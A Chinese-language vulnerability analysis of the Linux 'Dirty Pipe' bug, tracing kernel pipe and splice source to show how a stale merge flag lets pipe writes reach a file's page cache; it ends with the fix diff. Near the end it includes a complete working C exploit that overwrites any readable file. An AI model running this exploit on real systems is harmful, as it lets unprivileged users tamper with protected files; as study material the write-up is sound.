[TOC]

前言

影响范围：Linux 内核 5.8 及之后的版本；已在 5.16.11、5.15.25、5.10.102 中修复
攻击效果：普通用户可以覆盖任意可读文件中的前一页大小的数据（如果文件大小有一页的话）
利用限制：文件必须可读；最多写一页大小(其实不足一页)；不能增加文件内容，只能进行覆写

注：这里之所以用覆盖一词，是因为该漏洞不能扩大文件，只能覆写原来的内容

pipe 管道

管道是一种进程间通信的工具，可以使用 pipe/pipe2（没有说明，均指匿名管道）进行创建，其中内核会为管道创建一个虚拟的 inode，并分配两个文件描述符，分别表示读端和写端。

当我们创建一个管道时，内核会为其分配一个 pipe_inode_info 结构体和一个 pipe_buffer 结构体数组。其中笔者理解的是pipe_inode_info 存放的是管道的元数据，pipe_buffer 存放的是管道缓冲区的元数据。

先来看下 pipe_buffer：

/**
 *    struct pipe_buffer - a linux kernel pipe buffer
 *    @page: the page containing the data for the pipe buffer
 *    @offset: offset of data inside the @page
 *    @len: length of data inside the @page
 *    @ops: operations associated with this buffer. See @pipe_buf_operations.
 *    @flags: pipe buffer flags. See above.
 *    @private: private data owned by the ops.
 **/
struct pipe_buffer {
    struct page *page; // page frame that holds the data
    unsigned int offset, len; // offset and length of the data inside the page
    const struct pipe_buf_operations *ops; // operations table used for this buffer
    unsigned int flags; // buffer flags
    unsigned long private; // private data owned by ops
};

再来看下 pipe_inode_info：

/**
 *    struct pipe_inode_info - a linux kernel pipe
 *    @mutex: mutex protecting the pipe
 *    @rd_wait: reader wait queue, used when the pipe is empty
 *    @wr_wait: writer wait queue, used when the pipe is full
 *    @head: the point of buffer production
 *    @tail: the point of buffer consumption
 *    @note_loss: The next read() should insert a data-lost message
 *    @max_usage: The maximum number of slots that may be used in the ring
 *    @ring_size: total number of buffers (a power of 2)
 *    @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
 *    @tmp_page: cached released page
 *    @readers: number of current readers of this pipe
 *    @writers: number of current writers of this pipe
 *    @files: number of struct file referring to this pipe (protected by ->i_lock)
 *    @r_counter: reader counter
 *    @w_counter: writer counter
 *    @fasync_readers: reader side fasync
 *    @fasync_writers: writer side fasync
 *    @bufs: the circular array of pipe buffers
 *    @user: the user who created this pipe
 *    @watch_queue: If this pipe is a watch_queue, this is the stuff for that
 **/
struct pipe_inode_info {
    struct mutex mutex;
    wait_queue_head_t rd_wait, wr_wait;
    unsigned int head;
    unsigned int tail;
    unsigned int max_usage;
    unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
    bool note_loss;
#endif
    unsigned int nr_accounted;
    unsigned int readers;
    unsigned int writers;
    unsigned int files;
    unsigned int r_counter;
    unsigned int w_counter;
    struct page *tmp_page;
    struct fasync_struct *fasync_readers;
    struct fasync_struct *fasync_writers;
    struct pipe_buffer *bufs;
    struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
    struct watch_queue *watch_queue;
#endif
};

当使用 pipe/pipe2 系统调用创建管道时，其调用链如下：

do_pipe2()
    __do_pipe_flags()
        create_pipe_files()
            get_pipe_inode()
                alloc_pipe_info()

最后会调用到 alloc_pipe_info，其中 pipe_bufs 默认为 PIPE_DEF_BUFFERS 等于 16：

/*
 * Excerpt of alloc_pipe_info(): allocates the pipe_inode_info and the
 * array of pipe_buffer slots that backs it. Parts that are not relevant
 * to the discussion are elided and marked with "// ......".
 */
struct pipe_inode_info *alloc_pipe_info(void)
{
    struct pipe_inode_info *pipe;
    unsigned long pipe_bufs = PIPE_DEF_BUFFERS; // default number of ring slots
    struct user_struct *user = get_current_user();
    unsigned long user_bufs;
    unsigned int max_size = READ_ONCE(pipe_max_size);

    // allocate the pipe metadata
    pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);

    // ......

    // allocate the array of pipe_bufs pipe_buffer slots
    pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
                 GFP_KERNEL_ACCOUNT);
    // ......
}

所以整个关系图如下：

网上找了一个形象点的图（暂不知道图片出自何处，侵权即删）：

pipe_write

当我们向管道中写入数据时，最后会调用函数表中的 pipe_write 函数：

/*
 * File operations table for pipes/FIFOs. Per the entries below, reads are
 * dispatched to pipe_read and writes to pipe_write.
 */
const struct file_operations pipefifo_fops = {
    .open        = fifo_open,
    .llseek        = no_llseek,
    .read_iter    = pipe_read,
    .write_iter    = pipe_write,
    .poll        = pipe_poll,
    .unlocked_ioctl    = pipe_ioctl,
    .release    = pipe_release,
    .fasync        = pipe_fasync,
    .splice_write    = iter_file_splice_write,
};

pipe_write 函数如下：

/*
 * Write the data described by @from into the pipe behind iocb->ki_filp.
 *
 * First tries to append a partial-page remainder to the most recently
 * filled buffer (only if that buffer carries PIPE_BUF_FLAG_CAN_MERGE),
 * then places whatever is left into fresh ring slots, sleeping while the
 * pipe is full unless O_NONBLOCK is set.
 *
 * Returns the value accumulated in ret: a byte count on success, or one
 * of the negative error codes assigned below (-EPIPE, -EXDEV, -EFAULT,
 * -ENOMEM, -EAGAIN, -ERESTARTSYS).
 */
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
    struct file *filp = iocb->ki_filp;
    struct pipe_inode_info *pipe = filp->private_data;
    unsigned int head;
    ssize_t ret = 0;
    size_t total_len = iov_iter_count(from);
    ssize_t chars;
    bool was_empty = false;
    bool wake_next_writer = false;

    /* Null write succeeds. */
    if (unlikely(total_len == 0)) // total_len is the number of bytes to write
        return 0;

    __pipe_lock(pipe);

    if (!pipe->readers) { // no reader left: raise SIGPIPE and fail with -EPIPE
        send_sig(SIGPIPE, current, 0);
        ret = -EPIPE;
        goto out;
    }

#ifdef CONFIG_WATCH_QUEUE
    if (pipe->watch_queue) {
        ret = -EXDEV;
        goto out;
    }
#endif

    /*
     * Only wake up if the pipe started out empty, since
     * otherwise there should be no readers waiting.
     *
     * If it wasn't empty we try to merge new data into
     * the last buffer.
     *
     * That naturally merges small writes, but it also
     * page-aligs the rest of the writes for large writes
     * spanning multiple pages.
     */
    head = pipe->head; // current head of the ring
    was_empty = pipe_empty(head, pipe->tail); // empty check on head/tail of the ring
    chars = total_len & (PAGE_SIZE-1); // bytes left over after whole pages (total_len modulo PAGE_SIZE)
    if (chars && !was_empty) { // there is a partial-page remainder and the pipe is not empty: try to merge
        unsigned int mask = pipe->ring_size - 1; // index mask for the ring
        struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask]; // previous slot; the index wraps around the ring, e.g. with 16 slots mask is 15 and head == 0 gives (0 - 1) & 15 == 15
        int offset = buf->offset + buf->len; // position right after the data already in that buffer
        // Merge only if the previous buffer has PIPE_BUF_FLAG_CAN_MERGE set and
        // the remainder still fits into its page.
        if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
            offset + chars <= PAGE_SIZE) {
            ret = pipe_buf_confirm(pipe, buf);  // NOTE(review): the original annotation says this is a no-op for anon_pipe_buf_ops (no confirm hook) - confirm against the kernel source
            if (ret)
                goto out;

            ret = copy_page_from_iter(buf->page, offset, chars, from); // append into the existing page
            if (unlikely(ret < chars)) { // short copy: fail with -EFAULT
                ret = -EFAULT;
                goto out;
            }

            buf->len += ret; // success: account for the appended bytes
            if (!iov_iter_count(from))
                goto out;
        }
    }
    // Write the remaining data into the following buffers.
    for (;;) {
        if (!pipe->readers) { // all readers are gone: raise SIGPIPE
            send_sig(SIGPIPE, current, 0);
            if (!ret)
                ret = -EPIPE;
            break;
        }

        head = pipe->head; // re-read the current head
        if (!pipe_full(head, pipe->tail, pipe->max_usage)) { // the pipe is not full
            unsigned int mask = pipe->ring_size - 1;
            struct pipe_buffer *buf = &pipe->bufs[head & mask]; // slot at head
            struct page *page = pipe->tmp_page; // try to reuse a previously released page
            int copied;

            if (!page) { // nothing cached: allocate a new page
                page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
                if (unlikely(!page)) {
                    ret = ret ? : -ENOMEM;
                    break;
                }
                pipe->tmp_page = page;
            }

            /* Allocate a slot in the ring in advance and attach an
             * empty buffer.  If we fault or otherwise fail to use
             * it, either the reader will consume it or it'll still
             * be there for the next write.
             */
            spin_lock_irq(&pipe->rd_wait.lock); // take the rd_wait lock

            head = pipe->head;
            if (pipe_full(head, pipe->tail, pipe->max_usage)) { // the pipe became full: retry the loop
                spin_unlock_irq(&pipe->rd_wait.lock);
                continue;
            }

            pipe->head = head + 1; // advance head; it is stored unmasked and the mask is applied only where it is used as an index (bufs[head & mask])
            spin_unlock_irq(&pipe->rd_wait.lock); // release the lock

            /* Insert it into the buffer array */
            // attach the page to the slot
            buf = &pipe->bufs[head & mask]; 
            buf->page = page;
            buf->ops = &anon_pipe_buf_ops;
            buf->offset = 0;
            buf->len = 0;
            if (is_packetized(filp)) // per the original annotation this tests for O_DIRECT
                buf->flags = PIPE_BUF_FLAG_PACKET; // packet mode
            else
                buf->flags = PIPE_BUF_FLAG_CAN_MERGE; // otherwise later writes may be merged into this buffer
            pipe->tmp_page = NULL;

            copied = copy_page_from_iter(page, 0, PAGE_SIZE, from); // copy the data into the buffer's page
            if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
                if (!ret)
                    ret = -EFAULT;
                break;
            }
            ret += copied;
            buf->offset = 0;
            buf->len = copied;

            if (!iov_iter_count(from)) // all input consumed
                break;
        }
        // check again: if the pipe is not full, go around the loop
        if (!pipe_full(head, pipe->tail, pipe->max_usage)) 
            continue;

        /* Wait for buffer space to become available. */
        if (filp->f_flags & O_NONBLOCK) { // non-blocking and the pipe is full: return right away
            if (!ret)
                ret = -EAGAIN;
            break;
        }
        if (signal_pending(current)) {
            if (!ret)
                ret = -ERESTARTSYS;
            break;
        }
        // from here on: wait until the pipe has room again
        /*
         * We're going to release the pipe lock and wait for more
         * space. We wake up any readers if necessary, and then
         * after waiting we need to re-check whether the pipe
         * become empty while we dropped the lock.
         */
        __pipe_unlock(pipe);
        if (was_empty) {
            wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
            kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
        }
        wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
        __pipe_lock(pipe);
        was_empty = pipe_empty(pipe->head, pipe->tail);
        wake_next_writer = true;
    }
out:
    if (pipe_full(pipe->head, pipe->tail, pipe->max_usage))
        wake_next_writer = false;
    __pipe_unlock(pipe);

    /*
     * If we do do a wakeup event, we do a 'sync' wakeup, because we
     * want the reader to start processing things asap, rather than
     * leave the data pending.
     *
     * This is particularly important for small writes, because of
     * how (for example) the GNU make jobserver uses small writes to
     * wake up pending jobs
     */
    if (was_empty) {
        wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
        kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
    }
    if (wake_next_writer)
        wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
    if (ret > 0 && sb_start_write_trylock(file_inode(filp)->i_sb)) {
        int err = file_update_time(filp);
        if (err)
            ret = err;
        sb_end_write(file_inode(filp)->i_sb);
    }
    return ret;
}

所以整个流程大致如下：

前置检查
- 如果写入数据长度为0，则直接返回
- 如果读端全部关闭，则发送 SIGPIPE 信号，然后直接返回
尝试写入
- 若管道非空，且上一个缓冲区设置了 PIPE_BUF_FLAG_CAN_MERGE 标志，并且有足够的空间写入不足一页的那部分数据，则进行写入
- 若管道没满，然后写入<剩余>数据到新的缓冲区中，若创建管道时没有设置O_DIRECT，则pipe_buffer 会设置 PIPE_BUF_FLAG_CAN_MERGE 标志，然后尝试写入
- 若管道满了，但是设置了阻塞，则循环等待尝试第2步；若设置了非阻塞，则直接返回

所以可以看出在进行写管道时，每次会为缓冲区设置 PIPE_BUF_FLAG_CAN_MERGE 标志（默认情况下，因为使用pipe创建管道时，flag默认为0）。

pipe_read

读管道其实没啥好说的，就是读一个循环队列而已。

/*
 * Read up to iov_iter_count(@to) bytes from the pipe behind iocb->ki_filp
 * into @to, consuming buffers from the tail of the ring and releasing
 * each buffer once it has been fully read.
 *
 * Returns the number of bytes read, or one of the negative error codes
 * assigned below (-ENOBUFS, -EFAULT, -EAGAIN, -ERESTARTSYS, or the error
 * from pipe_buf_confirm).
 */
static ssize_t
pipe_read(struct kiocb *iocb, struct iov_iter *to)
{
    size_t total_len = iov_iter_count(to);
    struct file *filp = iocb->ki_filp;
    struct pipe_inode_info *pipe = filp->private_data;
    bool was_full, wake_next_reader = false;
    ssize_t ret;

    /* Null read succeeds. */
    if (unlikely(total_len == 0)) // zero bytes requested: return immediately
        return 0;

    ret = 0;
    __pipe_lock(pipe); // take the pipe lock

    /*
     * We only wake up writers if the pipe was full when we started
     * reading in order to avoid unnecessary wakeups.
     *
     * But when we do wake up writers, we do so using a sync wakeup
     * (WF_SYNC), because we want them to get going and generate more
     * data for us.
     */
    // Remember whether the pipe is full right now; as the comment above
    // explains, writers only need a wakeup if it was full when reading began.
    was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage); // is the pipe full?
    for (;;) {
        unsigned int head = pipe->head; // ring head
        unsigned int tail = pipe->tail; // ring tail
        unsigned int mask = pipe->ring_size - 1; // index mask for the ring

#ifdef CONFIG_WATCH_QUEUE // watch_queue handling, not part of the main path discussed here
        if (pipe->note_loss) {
            struct watch_notification n;

            if (total_len < 8) {
                if (ret == 0)
                    ret = -ENOBUFS;
                break;
            }

            n.type = WATCH_TYPE_META;
            n.subtype = WATCH_META_LOSS_NOTIFICATION;
            n.info = watch_sizeof(n);
            if (copy_to_iter(&n, sizeof(n), to) != sizeof(n)) {
                if (ret == 0)
                    ret = -EFAULT;
                break;
            }
            ret += sizeof(n);
            total_len -= sizeof(n);
            pipe->note_loss = false;
        }
#endif

        if (!pipe_empty(head, tail)) { // the pipe is not empty
            struct pipe_buffer *buf = &pipe->bufs[tail & mask]; // read from the slot at tail
            size_t chars = buf->len; // bytes available in this buffer
            size_t written;
            int error;

            if (chars > total_len) { // the buffer holds more than was requested
                if (buf->flags & PIPE_BUF_FLAG_WHOLE) { // buffer is flagged PIPE_BUF_FLAG_WHOLE: a partial read fails with -ENOBUFS
                    if (ret == 0)
                        ret = -ENOBUFS;
                    break;
                }
                chars = total_len;
            }

            error = pipe_buf_confirm(pipe, buf); // NOTE(review): the original annotation says this has no effect here - confirm against the kernel source
            if (error) {
                if (!ret)
                    ret = error;
                break;
            }

            written = copy_page_to_iter(buf->page, buf->offset, chars, to); // copy the data out to the caller
            if (unlikely(written < chars)) {
                if (!ret)
                    ret = -EFAULT;
                break;
            }
            ret += chars;
            buf->offset += chars;
            buf->len -= chars;

            /* Was it a packet buffer? Clean up and exit */
            if (buf->flags & PIPE_BUF_FLAG_PACKET) {
                total_len = chars;
                buf->len = 0;
            }

            if (!buf->len) { // the buffer has been fully consumed
                pipe_buf_release(pipe, buf); // release the buffer
                spin_lock_irq(&pipe->rd_wait.lock);
#ifdef CONFIG_WATCH_QUEUE
                if (buf->flags & PIPE_BUF_FLAG_LOSS)
                    pipe->note_loss = true;
#endif
                tail++;
                pipe->tail = tail;
                spin_unlock_irq(&pipe->rd_wait.lock);
            }
            total_len -= chars;
            if (!total_len) // the request has been satisfied
                break;    /* common path: read succeeded */
            if (!pipe_empty(head, tail))    /* More to do? */
                continue;
        }

        if (!pipe->writers)
            break;
        if (ret)
            break;
        if (filp->f_flags & O_NONBLOCK) {
            ret = -EAGAIN;
            break;
        }
        __pipe_unlock(pipe);

        /*
         * We only get here if we didn't actually read anything.
         *
         * However, we could have seen (and removed) a zero-sized
         * pipe buffer, and might have made space in the buffers
         * that way.
         *
         * You can't make zero-sized pipe buffers by doing an empty
         * write (not even in packet mode), but they can happen if
         * the writer gets an EFAULT when trying to fill a buffer
         * that already got allocated and inserted in the buffer
         * array.
         *
         * So we still need to wake up any pending writers in the
         * _very_ unlikely case that the pipe was full, but we got
         * no data.
         */
        if (unlikely(was_full)) {
            wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
            kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
        }

        /*
         * But because we didn't read anything, at this point we can
         * just return directly with -ERESTARTSYS if we're interrupted,
         * since we've done any required wakeups and there's no need
         * to mark anything accessed. And we've dropped the lock.
         */
        if (wait_event_interruptible_exclusive(pipe->rd_wait, pipe_readable(pipe)) < 0)
            return -ERESTARTSYS;

        __pipe_lock(pipe);
        was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
        wake_next_reader = true;
    }
    if (pipe_empty(pipe->head, pipe->tail))
        wake_next_reader = false;
    __pipe_unlock(pipe);

    if (was_full) {
        wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
        kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
    }
    if (wake_next_reader)
        wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
    if (ret > 0)
        file_accessed(filp);
    return ret;
}

大致流程：

就环形队列读，当缓冲区数据被读完时，释放缓冲区

splice 零拷贝

当我们想要将一个文件的数据拷贝到另一个文件时，常规做法就是打开两个文件，然后从源文件中读取数据，然后再将数据写入目标文件。但是这个做法需要多次在内核空间与用户空间之间进行数据拷贝，比较浪费资源。

而 splice 系统调用则利用 pipe 作为内核缓冲区，从而避免数据在内核空间与用户空间之间的拷贝造成的开销。

#define _GNU_SOURCE
#include <fcntl.h>
typedef long long loff_t;
ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);

当我们想要将一个文件的数据拷贝到另一个文件时：

我们可以先创建一个管道作为缓冲区
然后利用 splice 将源文件数据拷贝到管道中
最后再利用 splice 将管道中的数据拷贝到目标文件中即可

而我们知道，对于文件，其读写一般都是对 page_cache 进行的，所以上述整个数据拷贝过程都在内核空间进行

splice系统调用链如下：

/*
splice
    __do_splice
        do_splice
            splice_pipe_to_pipe
            do_splice_from
            splice_file_to_pipe
*/

在 do_splice 中会根据数据的流向去调用不同的函数：

从管道读取到管道，调用 splice_pipe_to_pipe
从管道读取到文件，调用 do_splice_from
从文件读取到管道，调用 splice_file_to_pipe

文件读取到管道

这里仅仅分析从文件读取到管道这一路径，这也是 dirty pipe 漏洞产生的关键地方。

而该函数有如下调用链：

/*
splice_file_to_pipe
    do_splice_to
         in->f_op->splice_read
             ......
                 filemap_read
                     filemap_get_pages
                     copy_page_to_iter
                         copy_page_to_iter_pipe
*/

最后会在 copy_page_to_iter_pipe 中，将文件的 page_cache 设置为对应 pipe_buffer 的 page，这样就相当于将文件中的数据拷贝到了管道中，可以看到这里并没有进行数据的实际拷贝，而是直接将 page_cache 挂在 pipe_buffer 上，所以是非常高效的。

其实这里大家就可以产生一个疑问了？我们是可以对管道进行读写操作的，那么现在 page_cache 挂在了 pipe_buffer 上，那是不是意味着我们可以直接对 page_cache 进行读写了呢？其实只要我们设置好相应的限制就可以避免这一点，而 dirty pipe 产生的原因就是没有做好相关的限制，使得我们可以直接对 page_cache 进行写操作（当然这都是马后炮）。

 static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
             struct iov_iter *i)
{
    /*
     * Attach @bytes bytes of @page, starting at @offset, to the pipe behind
     * the iterator @i. No data is copied: the pipe buffer is pointed at
     * @page itself. Returns the number of bytes attached, or 0 if nothing
     * could be added.
     *
     * Note that buf->flags is not written anywhere in this function, so the
     * slot keeps whatever flags it had before.
     */
    struct pipe_inode_info *pipe = i->pipe;
    struct pipe_buffer *buf;
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head = i->head;
    size_t off;

    if (unlikely(bytes > i->count))
        bytes = i->count;

    if (unlikely(!bytes))
        return 0;

    if (!sanity(i))
        return 0;

    off = i->iov_offset;
    buf = &pipe->bufs[i_head & p_mask];
    if (off) {
        if (offset == off && buf->page == page) {
            /* merge with the last one */
            buf->len += bytes;
            i->iov_offset += bytes;
            goto out;
        }
        i_head++;
        buf = &pipe->bufs[i_head & p_mask];
    }
    if (pipe_full(i_head, p_tail, pipe->max_usage))
        return 0;

    buf->ops = &page_cache_pipe_buf_ops;
    get_page(page); // take an extra reference on the page
    buf->page = page; // point the pipe buffer at the caller's page (no data copy)
    buf->offset = offset;
    buf->len = bytes;

    pipe->head = i_head + 1; // advance head by one slot
    i->iov_offset = offset + bytes;
    i->head = i_head;
out:
    i->count -= bytes;
    return bytes;
}

可以看到这里将 buf->page 设置为了 page_cache，并且将 pipe->head 加了1（这里与后面利用有关），但是并没有设置 buf 的 flags 标志。

网上找了个形象点的图（暂不知图片出自何处，侵权即删）：

漏洞分析

在上面我们已经分析了，在 copy_page_to_iter_pipe 函数中：

将 buf->page 设置为了 page_cache
将 pipe->head 加1
并没设置 buf 的 flags 标志，其保留的还是之前的标志

那么这里就会存在一个问题，在 pipe_write 中，我们分析了，在进行管道写时：

如果管道非空，且上一个缓冲区设置了 PIPE_BUF_FLAG_CAN_MERGE 标志，并且有足够的空间写入不足一页的那部分数据，则进行写入

所以虽然这里 pipe->head 加了1，但是如果上一个 buf 的 flags 设置了 PIPE_BUF_FLAG_CAN_MERGE 标志，并且其缓冲区有足够的空闲大小，则可以往里面写入数据。而 copy_page_to_iter_pipe 没有设置 flags，保留的还是之前的 flags，而 PIPE_BUF_FLAG_CAN_MERGE 标志正是在 pipe_write 中设置的（创建管道时不设置 O_DIRECT 标志即可）。所以这就给了我们往 page_cache 中写入数据的机会。

漏洞利用

prepare pipe
- 1、创建管道，并且不要设置 O_DIRECT 标志（默认即没有设置 O_DIRECT）
- 2、往管道中的所有缓冲区中写满数据，从而设置 PIPE_BUF_FLAG_CAN_MERGE 标志
- 3、将管道中的数据全部读出来
splice
- 1、利用 splice 系统调用将目标文件的一字节写入管道，此时管道中的某 buf 的 page 挂的就是 page_cache，并且 flags 保留了 prepare pipe 操作中的标志，此时带有 PIPE_BUF_FLAG_CAN_MERGE
- 2、然后就可以往 page_cache 中写数据了

注：通过上述函数分析可知：

目标文件必须可读，毕竟要将目标文件的数据读取到管道上
不能在页边界上写，在 pipe_write 中进行写入时，写入的字节应当满足total_len & (PAGE_SIZE-1) != 0
每个页面的第一个字节不能修改，因为至少得将文件上的一字节读取到管道中，而此时 buf->len 会被设置，写入时是从 offset+len 开始写的
写入时是针对 page_cache，所以不能修改文件大小，只能覆写；并且我们是通过管道写的 page_cache，所以其不会被标脏，因此修改只是暂时的，不会写回磁盘

exp如下：

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#define PAGE_SIZE 0x1000

/*
 * Print the command-line synopsis to stderr and terminate the process
 * with a failure status. Never returns.
 */
void usage(void)
{
        fputs("[+] Usage: ./exp target_file offset data\n", stderr);
        exit(EXIT_FAILURE);
}

/*
 * Report a fatal error and terminate the process with a failure status.
 *
 * msg: human-readable description; callers pass string literals, so it is
 *      taken as const. Never returns.
 */
void err_exit(const char *msg)
{
        /* Diagnostics go to stderr so they are not mixed into stdout. */
        fprintf(stderr, "[X] %s\n", msg);
        exit(EXIT_FAILURE);
}

/*
 * Dirty Pipe proof of concept.
 *
 * Usage: ./exp target_file offset data
 *
 * Overwrites the bytes of target_file starting at `offset` with `data`
 * in the page cache. The target only has to be readable. Constraints:
 *   - offset must not be a multiple of PAGE_SIZE, because the byte just
 *     before it is spliced into the pipe first;
 *   - offset + strlen(data) must stay inside the file (no growing);
 *   - the data must not cross a page boundary.
 *
 * Returns 0 on success; every failure terminates through usage() or
 * err_exit().
 */
int main(int argc, char** argv, char** env)
{

        int fd;
        int pipe_fd[2];
        int pipe_size;
        loff_t offset;
        loff_t page_off;
        size_t data_size;
        ssize_t n;
        char *end;
        char buf[PAGE_SIZE] = {0};
        struct stat st;

        (void)env;

        if (argc < 4) usage();

        /* strtoll reports malformed input through `end`, which atoi cannot. */
        offset = strtoll(argv[2], &end, 10);
        if (end == argv[2] || *end != '\0' || offset < 0) err_exit("Invalid offset");

        page_off = offset % PAGE_SIZE;
        if (page_off == 0) err_exit("Can't write boundary of page");

        fd = open(argv[1], O_RDONLY);
        if (fd < 0) err_exit("Can't open target file");

        if (fstat(fd, &st) < 0) err_exit("Can't get information of target file");

        data_size = strlen(argv[3]);

        /*
         * Bound the write by the absolute offset, and compare against the
         * remaining space instead of adding, so the check cannot overflow.
         */
        if (offset >= st.st_size || (loff_t)data_size > st.st_size - offset)
                err_exit("Can't write out of file size");

        /* The merge path in pipe_write only appends within a single page. */
        if ((loff_t)data_size > PAGE_SIZE - page_off)
                err_exit("Can't write across a page boundary");

        if (pipe(pipe_fd) < 0) err_exit("Can't create pipe");

        /* Ask for the real capacity instead of assuming 16 pages. */
        pipe_size = fcntl(pipe_fd[1], F_GETPIPE_SZ);
        if (pipe_size < 0) err_exit("Can't get pipe size");

        /* Fill the whole pipe so every slot has been written to once. */
        for (int left = pipe_size; left > 0; left -= (int)n) {
                size_t chunk = left > (int)sizeof(buf) ? sizeof(buf) : (size_t)left;

                n = write(pipe_fd[1], buf, chunk);
                if (n <= 0) err_exit("Can't write pipe");
        }

        /* Drain it again so the slots are free for the splice below. */
        for (int left = pipe_size; left > 0; left -= (int)n) {
                size_t chunk = left > (int)sizeof(buf) ? sizeof(buf) : (size_t)left;

                n = read(pipe_fd[0], buf, chunk);
                if (n <= 0) err_exit("Can't read pipe");
        }

        /*
         * Splice the single byte that precedes the target offset; the next
         * pipe write then continues right after it, i.e. at `offset`.
         */
        offset--;
        if (splice(fd, &offset, pipe_fd[1], NULL, 1, 0) <= 0) err_exit("Failed at splice");

        /* A short write would mean the payload was only partially applied. */
        n = write(pipe_fd[1], argv[3], data_size);
        if (n < 0 || (size_t)n != data_size) err_exit("Failed to write page cache");

        return 0;
}

内核版本5.13.0，测试效果如下：

总结

补丁：比较简单，就是设置一下 flags

diff --git a/lib/iov_iter.c b/lib/iov_iter.c
index b0e0acdf96c15..6dd5330f7a995 100644
--- a/lib/iov_iter.c
+++ b/lib/iov_iter.c
@@ -414,6 +414,7 @@ static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by
         return 0;

     buf->ops = &page_cache_pipe_buf_ops;
+    buf->flags = 0;
     get_page(page);
     buf->page = page;
     buf->offset = offset;
@@ -577,6 +578,7 @@ static size_t push_pipe(struct iov_iter *i, size_t size,
             break;

         buf->ops = &default_pipe_buf_ops;
+        buf->flags = 0;
         buf->page = page;
         buf->offset = 0;
         buf->len = min_t(ssize_t, left, PAGE_SIZE);

其实这类漏洞还是比较难发现的，因为一般情况下，它并不会造成系统 crash、宕机等，但是其利用确实非常简单，并不需要绕过 KASLR 等保护，这也是这个漏洞评分如此高的原因。